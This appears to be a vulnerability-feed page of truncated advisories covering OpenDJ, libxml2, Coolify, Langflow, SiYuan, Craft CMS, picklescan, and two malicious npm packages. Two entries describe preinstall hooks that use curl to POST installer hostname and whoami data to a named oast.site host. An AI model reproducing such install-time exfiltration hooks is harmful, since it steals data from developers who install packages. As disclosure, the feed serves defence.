PT-2026-51446

Name of the Vulnerable Software and Affected Versions OpenDJ Community Edition versions prior to 5.1.1 Description A Deserialization of Untrusted Data issue in the JMX RMI connector allows an unauthenticated remote attacker to deserialize arbitrary Java objects on the server. The issue occurs...

UBUNTU-CVE-2026-6653

Use After Free in libxml2's xmlParseInternalSubset from GNOME libxml2 version 2.9.11 to 2.11.0 allows a remote attacker to cause a denial-of-service via maliciously crafted XML input with improper entity resolution handling...

CVE-2026-12815 coollabsio coolify Image Name os command injection

A vulnerability has been found in coollabsio coolify 4.0.0. Impacted is an unknown function of the component Image Name Handler. Such manipulation leads to os command injection. The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in an...

Integer Overflow or Wraparound

Overview Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the xmlwf process when the -d parameter is used to specify an output directory. An attacker can cause unintended behavior or potentially execute arbitrary code by providing a specially crafted output...

Integer Overflow or Wraparound

Overview Affected versions of this package are vulnerable to Integer Overflow or Wraparound in the resolveSystemId function. An attacker can cause unexpected behavior or potentially execute arbitrary code by providing specially crafted input that triggers an integer overflow during processing...

MAL-2026-6249 Malicious code in blinkit-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8 On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...

MAL-2026-6253 Malicious code in zomato-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

Security Bulletin: Unauthenticated Flow Execution via Webhook Endpoint in Langflow OSS

Summary Langflow OSS POST /api/v1/webhook/flowid executes any user's flow without authentication by default. Setting WEBHOOKAUTHENABLE defaults to False in auth configuration. When False, webhook handler calls getuserbyflowidorendpointname and trusts caller unconditionally with no credential chec...

Security Bulletin: Unauthenticated Remote Code Execution in Langflow OSS PythonREPLComponent via Builtins Injection

Summary Langflow OSS contains unauthenticated RCE vulnerability in PythonREPLComponent "Python Interpreter". Component's getglobals builds restricted globals dict from globalimports whitelist default: "math" but never sets globals"builtins" = . CPython's exec automatically inserts full builtins...

CVE-2026-56395

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVE-2026-56397

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVE-2026-56382

Craft CMS composer package craftcms/cms versions = 5.5.0 and = 5.9.13 contain a remote code execution vulnerability in the FieldsController::actionRenderCardPreview method, which passes the fieldLayoutConfig POST parameter directly to Fields::createLayout without calling Component::cleanseConfig...

CVE-2025-71378

picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load...

CVE-2025-71357

picklescan before 0.0.30 fails to detect malicious pickle files using idlelib.pyshell.ModifiedInterpreter.runcommand in reduce methods. Attackers can embed undetected code in pickle files that executes remote commands when loaded by victims...

CVE-2025-71351

picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit in the reduce method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute...

CVE-2025-71348

picklescan before 0.0.28 fails to detect malicious pickle files that invoke torch.utils.configmodule.loadconfig function within reduce methods. Attackers can craft pickle files embedding arbitrary code that evades detection but executes during pickle.load, enabling remote code execution in supply...

CVE-2026-56397 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

EUVD-2026-38163

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVE-2026-56397

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVE-2026-56395 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...